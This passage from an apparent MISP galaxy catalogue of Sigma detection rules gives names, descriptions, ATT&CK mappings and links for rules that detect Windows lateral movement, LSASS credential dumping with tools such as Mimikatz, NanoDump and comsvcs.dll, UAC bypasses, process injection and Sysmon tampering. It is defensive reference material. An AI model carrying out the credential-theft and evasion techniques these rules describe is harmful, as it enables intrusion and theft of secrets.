  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1053" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="At - T1053.002" with estimative-language:likelihood-probability="almost-certain"

Table 8901. Table References

Links

https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md

https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931

https://github.com/zeronetworks/rpcfirewall

https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/

https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_lateral_movement.yml

Remote DCOM/WMI Lateral Movement

Detects remote RPC calls that perform remote DCOM operations. These could be abused for lateral movement via DCOM or WMI.

The tag is: misp-galaxy:sigma-rules="Remote DCOM/WMI Lateral Movement"

Remote DCOM/WMI Lateral Movement has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Distributed Component Object Model - T1021.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

Table 8902. Table References

Links

https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9

https://github.com/zeronetworks/rpcfirewall

https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/

https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_dcom_or_wmi.yml

Remote Schedule Task Lateral Movement via SASec

Detects remote RPC calls to create or execute a scheduled task via SASec

The tag is: misp-galaxy:sigma-rules="Remote Schedule Task Lateral Movement via SASec"

Remote Schedule Task Lateral Movement via SASec has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1053" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="At - T1053.002" with estimative-language:likelihood-probability="almost-certain"

Table 8903. Table References

Links

https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md

https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931

https://github.com/zeronetworks/rpcfirewall

https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/

https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sasec_lateral_movement.yml

SharpHound Recon Sessions

Detects remote RPC calls used by SharpHound to map remote connections and local group membership.

The tag is: misp-galaxy:sigma-rules="SharpHound Recon Sessions"

SharpHound Recon Sessions has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

Table 8905. Table References

Links

https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md

https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/02b1f559-fda2-4ba3-94c2-806eb2777183

https://github.com/zeronetworks/rpcfirewall

https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/

https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sharphound_recon_sessions.yml

Remote Registry Lateral Movement

Detects remote RPC calls to modify the registry and possibly execute code.

The tag is: misp-galaxy:sigma-rules="Remote Registry Lateral Movement"

Remote Registry Lateral Movement has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 8908. Table References

Links

https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78

https://github.com/zeronetworks/rpcfirewall

https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md

https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/

https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_registry_lateral_movement.yml

Potential Server Side Template Injection In Velocity

Detects exceptions in the Velocity template renderer. This most likely happens due to dynamic rendering of user input and may lead to RCE.

The tag is: misp-galaxy:sigma-rules="Potential Server Side Template Injection In Velocity"

Potential Server Side Template Injection In Velocity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 8911. Table References

Links

https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs

https://antgarsil.github.io/posts/velocity/

https://github.com/SigmaHQ/sigma/tree/master/rules/application/velocity/velocity_ssti_injection.yml

Credential Dumping Attempt Via Svchost

Detects when a process tries to access the memory of svchost to potentially dump credentials.

The tag is: misp-galaxy:sigma-rules="Credential Dumping Attempt Via Svchost"

Credential Dumping Attempt Via Svchost has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1548" with estimative-language:likelihood-probability="almost-certain"

Table 8912. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_svchost_credential_dumping.yml

Remote LSASS Process Access Through Windows Remote Management

Detects remote access to the LSASS process via WinRM. This could be a sign of credential dumping from tools like mimikatz.

The tag is: misp-galaxy:sigma-rules="Remote LSASS Process Access Through Windows Remote Management"

Remote LSASS Process Access Through Windows Remote Management has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Remote Management - T1021.006" with estimative-language:likelihood-probability="almost-certain"

Table 8913. Table References

Links

https://pentestlab.blog/2018/05/15/lateral-movement-winrm/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_remote_access_trough_winrm.yml

Lsass Memory Dump via Comsvcs DLL

Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.

The tag is: misp-galaxy:sigma-rules="Lsass Memory Dump via Comsvcs DLL"

Lsass Memory Dump via Comsvcs DLL has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 8914. Table References

Links

https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/

https://twitter.com/shantanukhande/status/1229348874298388484

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_dump_comsvcs_dll.yml

CMSTP Execution Process Access

Detects various indicators of Microsoft Connection Manager Profile Installer execution

The tag is: misp-galaxy:sigma-rules="CMSTP Execution Process Access"

CMSTP Execution Process Access has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="CMSTP - T1218.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Component Object Model - T1559.001" with estimative-language:likelihood-probability="almost-certain"

Table 8915. Table References

Links

https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_cmstp_execution_by_access.yml

HackTool - Generic Process Access

Detects process access requests from hacktool processes based on their default image name

The tag is: misp-galaxy:sigma-rules="HackTool - Generic Process Access"

HackTool - Generic Process Access has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 8916. Table References

Links

https://www.splunk.com/en_us/blog/security/you-bet-your-lsass-hunting-lsass-access.html

https://jsecurity101.medium.com/bypassing-access-mask-auditing-strategies-480fb641c158

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_hktl_generic_access.yml

Credential Dumping Attempt Via WerFault

Detects an LSASS process memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr, based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll, for Windows 10, Server 2016 and up.

The tag is: misp-galaxy:sigma-rules="Credential Dumping Attempt Via WerFault"

Credential Dumping Attempt Via WerFault has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 8917. Table References

Links

https://github.com/helpsystems/nanodump/commit/578116faea3d278d53d70ea932e2bbfe42569507

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_werfault.yml

Potential Direct Syscall of NtOpenProcess

Detects potential calls to NtOpenProcess directly from NTDLL.

The tag is: misp-galaxy:sigma-rules="Potential Direct Syscall of NtOpenProcess"

Potential Direct Syscall of NtOpenProcess has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"

Table 8918. Table References

Links

https://medium.com/falconforce/falconfriday-direct-system-calls-and-cobalt-strike-bofs-0xff14-741fa8e1bdd6

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_direct_ntopenprocess_call.yml

Suspicious LSASS Access Via MalSecLogon

Detects suspicious access to LSASS handle via a call trace to "seclogon.dll" with a suspicious access right.

The tag is: misp-galaxy:sigma-rules="Suspicious LSASS Access Via MalSecLogon"

Suspicious LSASS Access Via MalSecLogon has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 8919. Table References

Links

https://github.com/elastic/detection-rules/blob/2bc1795f3d7bcc3946452eb4f07ae799a756d94e/rules/windows/credential_access_lsass_handle_via_malseclogon.toml

https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html

https://twitter.com/SBousseaden/status/1541920424635912196

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_seclogon_access.yml

Suspicious Svchost Process Access

Detects suspicious access to the "svchost" process such as that used by Invoke-Phantom to kill the thread of the Windows event logging service.

The tag is: misp-galaxy:sigma-rules="Suspicious Svchost Process Access"

Suspicious Svchost Process Access has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable Windows Event Logging - T1562.002" with estimative-language:likelihood-probability="almost-certain"

Table 8920. Table References

Links

https://github.com/hlldz/Invoke-Phant0m

https://twitter.com/timbmsft/status/900724491076214784

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_svchost_susp_access_request.yml

UAC Bypass Using WOW64 Logger DLL Hijack

Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)

The tag is: misp-galaxy:sigma-rules="UAC Bypass Using WOW64 Logger DLL Hijack"

UAC Bypass Using WOW64 Logger DLL Hijack has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 8921. Table References

Links

https://github.com/hfiref0x/UACME

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_uac_bypass_wow64_logger.yml

Potential Shellcode Injection

Detects potential shellcode injection used by tools such as Metasploit’s migrate and Empire’s psinject

The tag is: misp-galaxy:sigma-rules="Potential Shellcode Injection"

Potential Shellcode Injection has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

Table 8922. Table References

Links

https://github.com/EmpireProject/PSInject

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_shellcode_injection.yml

HackTool - LittleCorporal Generated Maldoc Injection

Detects the process injection of a LittleCorporal generated Maldoc.

The tag is: misp-galaxy:sigma-rules="HackTool - LittleCorporal Generated Maldoc Injection"

HackTool - LittleCorporal Generated Maldoc Injection has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Thread Execution Hijacking - T1055.003" with estimative-language:likelihood-probability="almost-certain"

Table 8923. Table References

Links

https://github.com/connormcgarr/LittleCorporal

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_hktl_littlecorporal_generated_maldoc.yml

Potential Credential Dumping Activity Via LSASS

Detects process access requests to the LSASS process with specific call trace calls and access masks. This behaviour is expressed by many credential dumping tools such as Mimikatz, NanoDump, Invoke-Mimikatz, Procdump and even the Taskmgr dumping feature.

The tag is: misp-galaxy:sigma-rules="Potential Credential Dumping Activity Via LSASS"

Potential Credential Dumping Activity Via LSASS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 8924. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.001/T1003.001.md

https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html

https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html

https://research.splunk.com/endpoint/windows_possible_credential_dumping/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump.yml

HackTool - CobaltStrike BOF Injection Pattern

Detects a typical pattern of a CobaltStrike BOF which injects into other processes

The tag is: misp-galaxy:sigma-rules="HackTool - CobaltStrike BOF Injection Pattern"

HackTool - CobaltStrike BOF Injection Pattern has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 8925. Table References

Links

https://github.com/boku7/spawn

https://github.com/boku7/injectAmsiBypass

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_hktl_cobaltstrike_bof_injection_pattern.yml

Potential NT API Stub Patching

Detects potential NT API stub patching as seen used by the project PatchingAPI

The tag is: misp-galaxy:sigma-rules="Potential NT API Stub Patching"

Potential NT API Stub Patching has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable Windows Event Logging - T1562.002" with estimative-language:likelihood-probability="almost-certain"

Table 8927. Table References

Links

https://github.com/D1rkMtr/UnhookingPatch

https://twitter.com/D1rkMtr/status/1611471891193298944?s=20

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_invoke_patchingapi.yml

LSASS Access From Potentially White-Listed Processes

Detects a possible process memory dump that uses a white-listed filename like TrolleyExpress.exe as a way to dump the LSASS process memory without Microsoft Defender interference

The tag is: misp-galaxy:sigma-rules="LSASS Access From Potentially White-Listed Processes"

LSASS Access From Potentially White-Listed Processes has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 8928. Table References

Links

https://twitter.com/xpn/status/1491557187168178176

https://twitter.com/mrd0x/status/1460597833917251595

https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_whitelisted_process_names.yml

Credential Dumping Activity By Python Based Tool

Detects LSASS process access for potential credential dumping by a Python-like tool such as LaZagne or Pypykatz.

The tag is: misp-galaxy:sigma-rules="Credential Dumping Activity By Python Based Tool"

Credential Dumping Activity By Python Based Tool has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 8929. Table References

Links

https://github.com/skelsec/pypykatz

https://twitter.com/bh4b3sh/status/1303674603819081728

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_python_based_tool.yml

HackTool - HandleKatz Duplicating LSASS Handle

Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles

The tag is: misp-galaxy:sigma-rules="HackTool - HandleKatz Duplicating LSASS Handle"

HackTool - HandleKatz Duplicating LSASS Handle has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 8930. Table References

Links

https://github.com/codewhitesec/HandleKatz

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_hktl_handlekatz_lsass_access.yml

LSASS Memory Access by Tool With Dump Keyword In Name

Detects LSASS process access requests from a source process with the "dump" keyword in its image name.

The tag is: misp-galaxy:sigma-rules="LSASS Memory Access by Tool With Dump Keyword In Name"

LSASS Memory Access by Tool With Dump Keyword In Name has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 8931. Table References

Links

https://twitter.com/xpn/status/1491557187168178176

https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_dump_keyword_image.yml

Function Call From Undocumented COM Interface EditionUpgradeManager

Detects function calls from the EditionUpgradeManager COM interface, an interface that is not used by standard executables.

The tag is: misp-galaxy:sigma-rules="Function Call From Undocumented COM Interface EditionUpgradeManager"

Function Call From Undocumented COM Interface EditionUpgradeManager has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 8932. Table References

Links

https://www.snip2code.com/Snippet/4397378/UAC-bypass-using-EditionUpgradeManager-C/

https://gist.github.com/hfiref0x/de9c83966623236f5ebf8d9ae2407611

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_uac_bypass_editionupgrademanagerobj.yml

HackTool - SysmonEnte Execution

Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon

The tag is: misp-galaxy:sigma-rules="HackTool - SysmonEnte Execution"

HackTool - SysmonEnte Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable Windows Event Logging - T1562.002" with estimative-language:likelihood-probability="almost-certain"

Table 8933. Table References

Links

https://github.com/codewhitesec/SysmonEnte/blob/main/screens/1.png

https://github.com/codewhitesec/SysmonEnte/

https://codewhitesec.blogspot.com/2022/09/attacks-on-sysmon-revisited-sysmonente.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_hktl_sysmonente.yml

Potential Process Hollowing Activity

Detects when a memory process image does not match the disk image, indicative of process hollowing.

The tag is: misp-galaxy:sigma-rules="Potential Process Hollowing Activity"

Potential Process Hollowing Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Hollowing - T1055.012" with estimative-language:likelihood-probability="almost-certain"

Table 8934. Table References

Links

https://www.bleepingcomputer.com/news/microsoft/microsoft-sysmon-now-detects-malware-process-tampering-attempts/

https://twitter.com/SecurePeacock/status/1486054048390332423?s=20

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_tampering/proc_tampering_susp_process_hollowing.yml

Sysmon Blocked Executable

Triggers on any Sysmon "FileBlockExecutable" event, which indicates a violation of the configured block policy

The tag is: misp-galaxy:sigma-rules="Sysmon Blocked Executable"

Table 8935. Table References

Links

https://medium.com/@olafhartong/sysmon-14-0-fileblockexecutable-13d7ba3dff3e

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_file_block_executable.yml

Sysmon Configuration Change

Detects a Sysmon configuration change, which could be the result of a legitimate reconfiguration or of someone trying to manipulate the configuration

The tag is: misp-galaxy:sigma-rules="Sysmon Configuration Change"

Table 8936. Table References

Links

https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification.yml

Sysmon Blocked File Shredding

Triggers on any Sysmon "FileBlockShredding" event, which indicates a violation of the configured shredding policy.

The tag is: misp-galaxy:sigma-rules="Sysmon Blocked File Shredding"

Table 8937. Table References

Links

https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_file_block_shredding.yml

Sysmon Configuration Error

Detects, based on error messages, when an adversary is trying to hide its actions from Sysmon logging

The tag is: misp-galaxy:sigma-rules="Sysmon Configuration Error"

Sysmon Configuration Error has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hide Artifacts - T1564" with estimative-language:likelihood-probability="almost-certain"

Table 8938. Table References

Links

https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification_error.yml

Sysmon Configuration Modification

Detects when an attacker tries to hide from Sysmon by disabling or stopping it

The tag is: misp-galaxy:sigma-rules="Sysmon Configuration Modification"

Sysmon Configuration Modification has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hide Artifacts - T1564" with estimative-language:likelihood-probability="almost-certain"

Table 8939. Table References

Links

https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification_status.yml

Sysmon File Executable Creation Detected

Triggers on any Sysmon "FileExecutableDetected" event, which triggers every time a PE that is monitored by the config is created.

The tag is: misp-galaxy:sigma-rules="Sysmon File Executable Creation Detected"

Table 8940. Table References

Links

https://medium.com/@olafhartong/sysmon-15-0-file-executable-detected-40fd64349f36

https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_file_executable_detected.yml

CobaltStrike Named Pipe

Detects the creation of a named pipe as used by CobaltStrike

The tag is: misp-galaxy:sigma-rules="CobaltStrike Named Pipe"

CobaltStrike Named Pipe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

Table 8941. Table References

Links

https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis/

https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/

https://github.com/SigmaHQ/sigma/issues/253

https://twitter.com/d4rksystem/status/1357010969264873472

https://redcanary.com/threat-detection-report/threats/cobalt-strike/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_hktl_cobaltstrike.yml

PUA - CSExec Default Named Pipe

Detects default CSExec pipe creation

The tag is: misp-galaxy:sigma-rules="PUA - CSExec Default Named Pipe"

PUA - CSExec Default Named Pipe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 8942. Table References

Links

https://github.com/malcomvetter/CSExec

https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_pua_csexec_default_pipe.yml

HackTool - DiagTrackEoP Default Named Pipe

Detects creation of default named pipe used by the DiagTrackEoP POC, a tool that abuses "SeImpersonate" privilege.

The tag is: misp-galaxy:sigma-rules="HackTool - DiagTrackEoP Default Named Pipe"

Table 8943. Table References

Links

https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L22

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_hktl_diagtrack_eop.yml

HackTool - EfsPotato Named Pipe Creation

Detects the pattern of a pipe name as used by the hack tool EfsPotato

The tag is: misp-galaxy:sigma-rules="HackTool - EfsPotato Named Pipe Creation"

HackTool - EfsPotato Named Pipe Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

Table 8944. Table References

Links

https://github.com/zcgonvh/EfsPotato

https://twitter.com/SBousseaden/status/1429530155291193354?s=20

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_hktl_efspotato.yml

New PowerShell Instance Created

Detects the execution of PowerShell via the creation of a named pipe starting with PSHost

The tag is: misp-galaxy:sigma-rules="New PowerShell Instance Created"

New PowerShell Instance Created has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 8945. Table References

Links

https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html

https://threathunterplaybook.com/hunts/windows/190410-LocalPwshExecution/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_powershell_execution_pipe.yml

Alternate PowerShell Hosts Pipe

Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe

The tag is: misp-galaxy:sigma-rules="Alternate PowerShell Hosts Pipe"

Alternate PowerShell Hosts Pipe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 8946. Table References

Links

https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html

https://threathunterplaybook.com/hunts/windows/190410-LocalPwshExecution/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_powershell_alternate_host_pipe.yml

CobaltStrike Named Pipe Patterns

Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles

The tag is: misp-galaxy:sigma-rules="CobaltStrike Named Pipe Patterns"

CobaltStrike Named Pipe Patterns has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

Table 8947. Table References

Links

https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752

https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_hktl_cobaltstrike_susp_pipe_patterns.yml

PUA - PAExec Default Named Pipe

Detects PAExec default named pipe

The tag is: misp-galaxy:sigma-rules="PUA - PAExec Default Named Pipe"

PUA - PAExec Default Named Pipe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 8948. Table References

Links

https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/efa17a600b43c897b4b7463cc8541daa1987eeb4/Command%20and%20Control/C2-NamedPipe.md

https://github.com/poweradminllc/PAExec

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_pua_paexec_default_pipe.yml

HackTool - Credential Dumping Tools Named Pipe Created

Detects well-known credential dumping tools execution via specific named pipe creation

The tag is: misp-galaxy:sigma-rules="HackTool - Credential Dumping Tools Named Pipe Created"

HackTool - Credential Dumping Tools Named Pipe Created has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Cached Domain Credentials - T1003.005" with estimative-language:likelihood-probability="almost-certain"

Table 8949. Table References

Links

https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment

https://image.slidesharecdn.com/zeronights2017kheirkhabarov-171118103000/75/hunting-for-credentials-dumping-in-windows-environment-57-2048.jpg?cb=1666035799

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_hktl_generic_cred_dump_tools_pipes.yml

HackTool - Koh Default Named Pipe

Detects creation of default named pipes used by the Koh tool

The tag is: misp-galaxy:sigma-rules="HackTool - Koh Default Named Pipe"

HackTool - Koh Default Named Pipe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steal Application Access Token - T1528" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Token Impersonation/Theft - T1134.001" with estimative-language:likelihood-probability="almost-certain"

Table 8950. Table References

Links

https://github.com/GhostPack/Koh/blob/0283d9f3f91cf74732ad377821986cfcb088e20a/Clients/BOF/KohClient.c#L12

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_hktl_koh_default_pipe.yml

ADFS Database Named Pipe Connection By Uncommon Tool

Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database). Such connections are used to access information such as the AD FS configuration settings, which contain sensitive information used to sign SAML tokens.

The tag is: misp-galaxy:sigma-rules="ADFS Database Named Pipe Connection By Uncommon Tool"

ADFS Database Named Pipe Connection By Uncommon Tool has relationships with:

